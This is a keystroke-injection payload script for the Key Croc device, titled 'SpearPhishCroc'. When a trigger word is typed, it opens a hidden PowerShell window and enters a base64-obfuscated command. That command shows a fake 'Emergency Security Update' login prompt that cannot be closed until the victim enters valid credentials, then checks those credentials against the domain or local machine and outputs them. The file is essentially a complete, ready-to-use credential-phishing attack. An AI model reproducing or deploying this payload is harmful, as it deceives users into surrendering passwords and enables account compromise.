78 lines
4.5 KiB
Plaintext
78 lines
4.5 KiB
Plaintext
#######################################################SpearPhishCroc############################################################
|
|
# Version 1.0
|
|
# OS: Windows
|
|
# Author: 0i41E
|
|
# Idea and code based on Invoke-CredentialsPhish from Nikhil Mittal
|
|
################Trigger a popup, demanding for valid credentials, popup can't be closed without valid credentials################
|
|
MATCH phishy
|
|
|
|
export DUCKY_LANG=de
|
|
|
|
C2NOTIFY INFO 'SpearPhish attack started!'
|
|
|
|
########################################Opening Powershell hidden - Executing base64 encoded payload#############################
|
|
|
|
DELAY 1500
|
|
Q GUI r
|
|
Q DELAY 500
|
|
Q STRING powershell -NoP -NonI -w hidden
|
|
Q DELAY 250
|
|
Q ENTER
|
|
|
|
DELAY 200
|
|
Q STRING "powershell.exe -enc WwBDAG0AZABsAGUAdABCAGkAbgBkAGkAbgBnACgAKQBdAA0ACgBQAGEAcgBhAG0AIAAoACkADQAKAA0ACgAgACAAIAAgACQARQBy"
|
|
Q DELAY 100
|
|
Q STRING "AHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgANAAoAIAAgACAAIABB"
|
|
Q DELAY 100
|
|
Q STRING "AGQAZAAtAFQAeQBwAGUAIAAtAGEAcwBzAGUAbQBiAGwAeQBuAGEAbQBlACAAcwB5AHMAdABlAG0ALgBEAGkAcgBlAGMAdABvAHIAeQBTAGUAcgB2AGkAYwBlA"
|
|
Q DELAY 100
|
|
Q STRING "HMALgBhAGMAYwBvAHUAbgB0AG0AYQBuAGEAZwBlAG0AZQBuAHQAIAANAAoAIAAgACAAIAAkAEQAUwAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AH"
|
|
Q DELAY 100
|
|
Q STRING "MAdABlAG0ALgBEAGkAcgBlAGMAdABvAHIAeQBTAGUAcgB2AGkAYwBlAHMALgBBAGMAYwBvAHUAbgB0AE0AYQBuAGEAZwBlAG0AZQBuAHQALgBQAHIAaQBuAGM"
|
|
Q DELAY 100
|
|
Q STRING "AaQBwAGEAbABDAG8AbgB0AGUAeAB0ACgAWwBTAHkAcwB0AGUAbQAuAEQAaQByAGUAYwB0AG8AcgB5AFMAZQByAHYAaQBjAGUAcwAuAEEAYwBjAG8AdQBuAHQA"
|
|
Q DELAY 100
|
|
Q STRING "TQBhAG4AYQBnAGUAbQBlAG4AdAAuAEMAbwBuAHQAZQB4AHQAVAB5AHAAZQBdADoAOgBNAGEAYwBoAGkAbgBlACkADQAKACAAIAAgACAAJABkAG8AbQBhAGkAb"
|
|
Q DELAY 100
|
|
Q STRING "gBEAE4AIAA9ACAAIgBMAEQAQQBQADoALwAvACIAIAArACAAKABbAEEARABTAEkAXQAiACIAKQAuAGQAaQBzAHQAaQBuAGcAdQBpAHMAaABlAGQATgBhAG0AZQ"
|
|
Q DELAY 100
|
|
Q STRING "ANAAoAIAAgACAAIAB3AGgAaQBsAGUAKAAkAHQAcgB1AGUAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABjAHIAZQBkAGUAbgB0AGkAYQB"
|
|
Q DELAY 100
|
|
Q STRING "sACAAPQAgACQAaABvAHMAdAAuAHUAaQAuAFAAcgBvAG0AcAB0AEYAbwByAEMAcgBlAGQAZQBuAHQAaQBhAGwAKAAiAEUAbQBlAHIAZwBlAG4AYwB5ACAAUwBlA"
|
|
Q DELAY 100
|
|
Q STRING "GMAdQByAGkAdAB5ACAAVQBwAGQAYQB0AGUAIgAsACAAIgBQAGwAZQBhAHMAZQAgAGUAbgB0AGUAcgAgAHkAbwB1AHIAIAB1AHMAZQByAG4AYQBtAGUAIABhAG4"
|
|
Q DELAY 100
|
|
Q STRING "AZAAgAHAAYQBzAHMAdwBvAHIAZAAuACIALAAgACIAIgAsACAAIgAiACkADQAKACAAIAAgACAAIAAgACAAIABpAGYAKAAkAGMAcgBlAGQAZQBuAHQAaQBhAGwAK"
|
|
Q DELAY 100
|
|
Q STRING "QANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAYwByAGUAZABzACAAPQAgACQAYwByAGUAZABlAG4AdABpAGEAbAAu"
|
|
Q DELAY 100
|
|
Q STRING "AEcAZQB0AE4AZQB0AHcAbwByAGsAQwByAGUAZABlAG4AdABpAGEAbAAoACkADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFsAUwB0AHIAaQBuAGcAXQAkAHU"
|
|
Q DELAY 100
|
|
Q STRING "AcwBlAHIAIAA9ACAAJABjAHIAZQBkAHMALgB1AHMAZQByAG4AYQBtAGUADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFsAUwB0AHIAaQBuAGcAXQAkAHAAYQ"
|
|
Q DELAY 100
|
|
Q STRING "BzAHMAIAA9ACAAJABjAHIAZQBkAHMALgBwAGEAcwBzAHcAbwByAGQADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFsAUwB0AHIAaQBuAGcAXQAkAGQAbwBtA"
|
|
Q DELAY 100
|
|
Q STRING "GEAaQBuACAAPQAgACQAYwByAGUAZABzAC4AZABvAG0AYQBpAG4ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAYQB1AHQAaABsAG8AYwBhAGwAIAA9ACAAJ"
|
|
Q DELAY 100
|
|
Q STRING "ABEAFMALgBWAGEAbABpAGQAYQB0AGUAQwByAGUAZABlAG4AdABpAGEAbABzACgAJAB1AHMAZQByACwAIAAkAHAAYQBzAHMAKQANAAoAIAAgACAAIAAgACAAIAAgA"
|
|
Q DELAY 100
|
|
Q STRING "CAAIAAgACAAJABhAHUAdABoAGQAbwBtAGEAaQBuACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQByAGUAYwB0AG8AcgB5AFMAZQB"
|
|
Q DELAY 100
|
|
Q STRING "yAHYAaQBjAGUAcwAuAEQAaQByAGUAYwB0AG8AcgB5AEUAbgB0AHIAeQAoACQAZABvAG0AYQBpAG4ARABOACwAJAB1AHMAZQByACwAJABwAGEAcwBzACkADQAKACAA"
|
|
Q DELAY 100
|
|
Q STRING "IAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAoACgAJABhAHUAdABoAGwAbwBjAGEAbAAgAC0AZQBxACAAJAB0AHIAdQBlACkAIAAtAG8AcgAgACgAJABhAHUAdABoA"
|
|
Q DELAY 100
|
|
Q STRING "GQAbwBtAGEAaQBuAC4AbgBhAG0AZQAgAC0AbgBlACAAJABuAHUAbABsACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIA"
|
|
Q DELAY 100
|
|
Q STRING "AgACAAIAAgACAAIAAgACAAIAAkAG8AdQB0AHAAdQB0ACAAPQAgACIAVQBzAGUAcgBuAGEAbQBlADoAIAAiACAAKwAgACQAdQBzAGUAcgAgACsAIAAiACAAUABhAHMA"
|
|
Q DELAY 100
|
|
Q STRING "cwB3AG8AcgBkADoAIAAiACAAKwAgACQAcABhAHMAcwAgACsAIAAiACAARABvAG0AYQBpAG4AOgAiACAAKwAgACQAZABvAG0AYQBpAG4AIAArACAAIgAgAEQAbwBtAG"
|
|
Q DELAY 100
|
|
Q STRING "EAaQBuADoAIgArACAAJABhAHUAdABoAGQAbwBtAGEAaQBuAC4AbgBhAG0AZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAG8AdQB0AHAAdQB0A"
|
|
Q DELAY 100
|
|
Q STRING "A0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGIAcgBlAGEAawANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAg"
|
|
Q DELAY 100
|
|
Q STRING "AH0ADQAKACAAIAAgACAAfQA="
|
|
Q DELAY 100
|
|
Q ENTER
|